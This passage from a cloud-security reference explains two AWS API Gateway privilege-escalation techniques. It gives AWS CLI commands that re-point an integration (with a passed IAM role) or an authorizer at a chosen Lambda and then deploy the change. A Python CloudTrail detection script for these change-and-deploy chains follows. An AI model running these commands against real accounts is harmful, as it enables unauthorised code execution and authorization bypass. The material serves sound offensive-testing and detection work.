An attacker with the apigateway:PutIntegration, apigateway:CreateDeployment and iam:PassRole permissions can add a new integration to an existing API Gateway REST API that points at a Lambda function with an IAM role attached. The attacker can then trigger the Lambda function to execute arbitrary code and potentially gain access to the resources the IAM role grants.
```bash
API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"
LAMBDA_ROLE_ARN="arn:aws:iam::account-id:role/lambda-role"

# Add a new integration to the API Gateway REST API
aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --type AWS_PROXY --integration-http-method POST --uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations --credentials $LAMBDA_ROLE_ARN

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
An attacker with the apigateway:UpdateAuthorizer and apigateway:CreateDeployment permissions can modify an existing API Gateway authorizer to bypass security checks, or to execute arbitrary code whenever API requests are made.
```bash
API_ID="your-api-id"
AUTHORIZER_ID="your-authorizer-id"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"

# Update the API Gateway authorizer
aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZER_ID --authorizer-uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
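Both techniques above share the same shape in CloudTrail: a call that changes how a REST API routes or authorizes requests (PutIntegration, UpdateAuthorizer), followed by a CreateDeployment on the same restApiId that makes the change live. The following Python script is an added detection example, not code from the original page: it correlates those events over a batch of CloudTrail-style records and rates a change that is deployed within a short window higher than one that is not. The sample records are constructed, and the requestParameters field names (restApiId, credentials, uri, patchOperations, createDeploymentInput) are an assumption approximating CloudTrail's layout; verify them against real records before relying on the rule.

```python
"""Flag API Gateway change-and-deploy chains in CloudTrail-style records.

Added detection example (not from the original page). Field names under
requestParameters are an assumption approximating CloudTrail's shape.
"""
import json
from datetime import datetime, timedelta

# Calls that alter routing or authorization of an existing REST API.
SENSITIVE_CHANGES = {"PutIntegration", "UpdateAuthorizer"}
# A deployment this soon after the change makes it live in a stage.
WINDOW = timedelta(minutes=30)

# Constructed sample records (not real data). Account id and ARNs are placeholders.
SAMPLE_EVENTS = [
    {"eventTime": "2024-01-01T10:00:00Z", "eventSource": "apigateway.amazonaws.com",
     "eventName": "PutIntegration",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/dev-user"},
     "requestParameters": {
         "restApiId": "abc123", "resourceId": "r1", "httpMethod": "GET", "type": "AWS_PROXY",
         "uri": "arn:aws:apigateway:us-east-1:lambda:path/2015-03-31/functions/"
                "arn:aws:lambda:us-east-1:111122223333:function:fn/invocations",
         "credentials": "arn:aws:iam::111122223333:role/lambda-role"}},
    {"eventTime": "2024-01-01T10:04:00Z", "eventSource": "apigateway.amazonaws.com",
     "eventName": "CreateDeployment",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/dev-user"},
     "requestParameters": {"restApiId": "abc123", "createDeploymentInput": {"stageName": "Prod"}}},
    {"eventTime": "2024-01-01T11:00:00Z", "eventSource": "apigateway.amazonaws.com",
     "eventName": "UpdateAuthorizer",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/dev-user"},
     "requestParameters": {
         "restApiId": "def456", "authorizerId": "auth1",
         "patchOperations": [{"op": "replace", "path": "/authorizerUri",
                              "value": "arn:aws:apigateway:us-east-1:lambda:path/2015-03-31/functions/"
                                       "arn:aws:lambda:us-east-1:111122223333:function:other/invocations"}]}},
    # Deployment two hours later: outside WINDOW, so the authorizer change is not chained.
    {"eventTime": "2024-01-01T13:00:00Z", "eventSource": "apigateway.amazonaws.com",
     "eventName": "CreateDeployment",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/release-bot"},
     "requestParameters": {"restApiId": "def456", "createDeploymentInput": {"stageName": "Prod"}}},
]


def parse_time(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def describe_change(event):
    """Summarise what a sensitive change touched: the resource and the new target."""
    params = event.get("requestParameters") or {}
    if event["eventName"] == "PutIntegration":
        return {"kind": "integration",
                "resource": f'{params.get("httpMethod")} {params.get("resourceId")}',
                "target": params.get("uri"),
                # A role passed here is what the integration will execute as.
                "credentials": params.get("credentials")}
    if event["eventName"] == "UpdateAuthorizer":
        new_uri = None
        for op in params.get("patchOperations", []):
            if op.get("path") == "/authorizerUri":
                new_uri = op.get("value")
        return {"kind": "authorizer", "resource": params.get("authorizerId"),
                "target": new_uri, "credentials": None}
    return None


def find_change_deploy_chains(events, window=WINDOW):
    """Return one finding per sensitive change; severity rises if it was deployed in time."""
    apigw = [e for e in events if e.get("eventSource") == "apigateway.amazonaws.com"]
    apigw.sort(key=lambda e: parse_time(e["eventTime"]))
    deployments = [e for e in apigw if e["eventName"] == "CreateDeployment"]
    findings = []
    for change in (e for e in apigw if e["eventName"] in SENSITIVE_CHANGES):
        api = (change.get("requestParameters") or {}).get("restApiId")
        t_change = parse_time(change["eventTime"])
        deploy = next((d for d in deployments
                       if (d.get("requestParameters") or {}).get("restApiId") == api
                       and timedelta(0) <= parse_time(d["eventTime"]) - t_change <= window), None)
        findings.append({
            "restApiId": api,
            "changed_by": change["userIdentity"]["arn"],
            "change": describe_change(change),
            "deployed": deploy is not None,
            "stage": (deploy["requestParameters"].get("createDeploymentInput") or {}).get("stageName")
                     if deploy else None,
            "severity": "high" if deploy else "medium",
        })
    return findings


if __name__ == "__main__":
    print(json.dumps(find_change_deploy_chains(SAMPLE_EVENTS), indent=2))
```

The "medium" finding for an undeployed change is deliberate: an altered integration or authorizer is only reachable once deployed, but the change itself is still worth a look, and a later CreateDeployment by a different principal would otherwise be missed when the window closes.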